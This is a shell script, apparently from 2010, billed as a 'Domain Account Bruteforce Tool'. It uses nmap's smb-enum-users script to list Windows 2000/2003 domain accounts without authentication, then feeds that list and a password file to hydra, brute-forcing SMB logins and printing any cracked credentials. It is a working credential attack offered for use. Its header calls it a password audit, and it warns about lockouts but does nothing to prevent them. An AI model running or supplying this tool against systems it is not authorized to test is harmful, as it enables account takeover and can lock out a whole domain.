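#!/bin/sh
#
# Interactive wrapper around nmap's smb-enum-users script and hydra's smbnt
# module, for password audits of Windows 2000/2003 domain accounts.
#
# Flow:
#   1. Prompt for the target server and a password file.
#   2. Run nmap smb-enum-users against ports 139/445 on the target.
#   3. Reduce the nmap report to one account name per line.
#   4. Run hydra (single task, -t1) with that user list and the password file.
#   5. Print fields 6-11 of every "login:" line from hydra's report.
#
# Requires: nmap, hydra, mktemp; write access to /root/results.txt.
# Output:   /root/results.txt holds hydra's full report and is left in place.

set -u
# Intermediate files hold account names and the report can hold confirmed
# passwords, so nothing this script creates should be group/world readable.
umask 077

results_file=/root/results.txt

# Print a message on stderr and stop.
die() {
  printf '%s\n' "$*" >&2
  exit 1
}

for tool in nmap hydra mktemp; do
  command -v "$tool" >/dev/null 2>&1 || die "Required tool not found: $tool"
done

cat <<'EOF'

*******************************************************
* *
* Welcome to the Domain Account Bruteforce Tool. *
* By Sean gambles 21st Sep 2010 *
*******************************************************

This tool makes use of the nmap smb-enum-users script,
by basically exporting the results, in a cleaned up form
into hydra for bruteforcing.

Currently, only working with server 2000, 2003 family.
This is due to server 2008 not allowing unauthenticated
account enumeration.

*** Please observe account lockout thresholds before
submitting your password file into this tool, as there
is no protection against lockouts taking place. ***

EOF

echo "Please enter the target server IP :"
IFS= read -r target || die "No target supplied"
echo "Please enter the path to your password file"
echo "E.g /root/passwords.txt"
IFS= read -r passfile || die "No password file supplied"

# The target is handed to nmap and hydra as a bare argument. Reject empty
# values, anything that would be parsed as an option, and any character that
# cannot appear in an IP address or host name.
case $target in
  '' | -* | *[!A-Za-z0-9.:_-]*)
    die "Invalid target: expected an IP address or host name"
    ;;
esac

if [ ! -f "$passfile" ] || [ ! -r "$passfile" ]; then
  die "Password file is missing or unreadable: $passfile"
fi

# Private scratch directory instead of fixed names under /root or the current
# directory; removed on every exit path so the account list does not linger.
workdir=$(mktemp -d) || die "Could not create a private working directory"
trap 'rm -rf -- "${workdir:?}"' EXIT
trap 'exit 1' HUP INT TERM

scan_file=$workdir/nmap-users.txt
users_file=$workdir/users.txt

echo "Enumerating users, please wait...."
nmap -p139,445 -n "$target" --script=smb-enum-users >"$scan_file" \
  || die "nmap enumeration failed"

# Cleans up the user list file by removing template accounts and computer
# names: drop lines containing '$' (machine accounts) or "Tmpl", keep lines
# that carry a RID, take the text between the domain backslash and the
# opening parenthesis, then strip the single trailing character left before
# the parenthesis.
grep -v '\$' "$scan_file" \
  | grep -v Tmpl \
  | grep RID \
  | cut -d '\' -f2 \
  | cut -d '(' -f1 \
  | sed 's/.$//' >"$users_file"

[ -s "$users_file" ] || die "No user accounts were enumerated; nothing to test."

# Create the report up front with owner-only permissions; umask alone does
# not tighten a file that already exists from an earlier run.
: >"$results_file" || die "Cannot write $results_file"
chmod 600 "$results_file" || die "Cannot restrict permissions on $results_file"

echo "Trying passwords against all the user accounts, please wait...."
# hydra's exit status is not treated as fatal so that whatever it managed to
# report is still summarised below.
hydra "$target" smbnt -s445 -L "$users_file" -P "$passfile" -t1 -e n -m D \
  >"$results_file" \
  || echo "hydra exited with a non-zero status; results may be incomplete" >&2

echo "*********************************************************"
echo
echo "Domain accounts found :"
echo
grep 'login:' "$results_file" | cut -d ' ' -f6-11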